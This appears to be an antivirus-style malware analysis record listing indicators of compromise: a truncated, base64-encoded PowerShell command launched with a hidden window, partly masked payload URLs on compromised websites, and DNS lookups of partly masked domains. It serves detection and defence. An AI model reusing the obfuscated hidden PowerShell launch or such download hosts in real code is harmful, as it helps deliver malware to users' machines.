Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABaAGwANQAxAHMAZABvAD0AKAAoACcAQgAnACsAJwByAHcAJwApACsAJwB0ACcAKwAoACcAagA2ACcAKwAnAHgAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBFAHIAcAByAG8AZgBpAEwAZQ...
- http://vi#.##zhiguoren.com/cache/Zh/
- http://do####bingfu.com/wp-includes/4bot/
- DNS ASK sp####monizze.com
- DNS ASK ji###guoren.com
- DNS ASK mo###wang.net
- DNS ASK vi#.##zhiguoren.com
- DNS ASK di###efaz.com
- DNS ASK do####bingfu.com
- DNS ASK mu###inxi.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABaAGwANQAxAHMAZABvAD0AKAAoACcAQgAnACsAJwByAHcAJwApACsAJwB0ACcAKwAoACcAagA2ACcAKwAnAHgAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBFAHIAcAByAG8AZgBpAEwAZQ...' (with hidden window)